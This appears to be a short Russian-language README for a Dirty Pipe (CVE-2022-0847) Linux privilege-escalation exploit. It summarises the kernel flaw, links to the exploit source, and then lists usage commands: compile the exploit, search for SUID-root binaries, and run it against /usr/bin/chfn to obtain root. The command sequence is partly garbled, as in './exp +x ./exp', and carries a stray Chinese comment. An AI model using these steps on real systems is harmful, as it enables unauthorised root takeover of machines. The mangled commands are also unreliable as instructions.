
CVE-2022-0847-DirtyPipe-Exploit
7 марта зарубежный исследователь безопасности Max Kellermann опубликовал в блоге информацию о локальной уязвимости повышения привилегий CVE-2022-0847 в ядре Linux: https://dirtypipe.cm4all.com/
CVE-2022-0847 — это локальная уязвимость повышения привилегий, существующая в ядре Linux версии 5.8 и выше. Используя эту уязвимость, злоумышленник может перезаписывать данные в любых читаемых файлах, тем самым повышая привилегии обычного пользователя до привилегированного root.
Принцип действия CVE-2022-0847 похож на уязвимость CVE-2016-5195 (Dirty Cow), но её гораздо проще эксплуатировать. Автор назвал эту уязвимость "Dirty Pipe".
Ссылка: https://haxx.in/files/dirtypipez.c
Автор: Max Kellermann [email protected]
gcc -o exp exploit.c
./exp +x ./exp
# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
./exp /usr/bin/chfn
